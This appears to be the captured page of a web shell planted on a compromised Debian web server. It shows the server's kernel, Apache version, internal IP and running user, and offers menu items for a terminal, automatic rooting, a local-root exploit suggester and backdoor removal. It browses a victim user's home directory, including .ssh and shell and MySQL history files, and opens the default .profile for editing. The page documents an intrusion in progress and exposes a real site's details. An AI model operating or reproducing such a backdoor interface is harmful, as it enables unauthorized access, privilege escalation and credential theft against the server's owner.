Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
cesasatv /
Delete
Unzip
Name
Size
Permission
Date
Action
.config
[ DIR ]
drwxr-xr-x
2025-06-07 09:50
.local
[ DIR ]
drwxr-xr-x
2025-06-05 08:10
.ssh
[ DIR ]
drwx------
2025-06-07 12:38
.bash_history
8.94
KB
-rw-------
2025-06-08 09:10
.bash_logout
220
B
-rw-r--r--
2024-03-29 19:40
.bashrc
3.44
KB
-rw-r--r--
2024-03-29 19:40
.mysql_history
129
B
-rw-------
2025-06-07 11:17
.profile
807
B
-rw-r--r--
2024-03-29 19:40
.wget-hsts
167
B
-rw-r--r--
2025-06-05 11:20
composer.phar
2.98
MB
-rwxr-xr-x
2025-06-05 11:31
Save
Rename
# ~/.profile: executed by the command interpreter for login shells. # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login # exists. # see /usr/share/doc/bash/examples/startup-files for examples. # the files are located in the bash-doc package. # the default umask is set in /etc/profile; for setting the umask # for ssh logins, install and configure the libpam-umask package. #umask 022 # if running bash if [ -n "$BASH_VERSION" ]; then # include .bashrc if it exists if [ -f "$HOME/.bashrc" ]; then . "$HOME/.bashrc" fi fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/bin" ] ; then PATH="$HOME/bin:$PATH" fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/.local/bin" ] ; then PATH="$HOME/.local/bin:$PATH" fi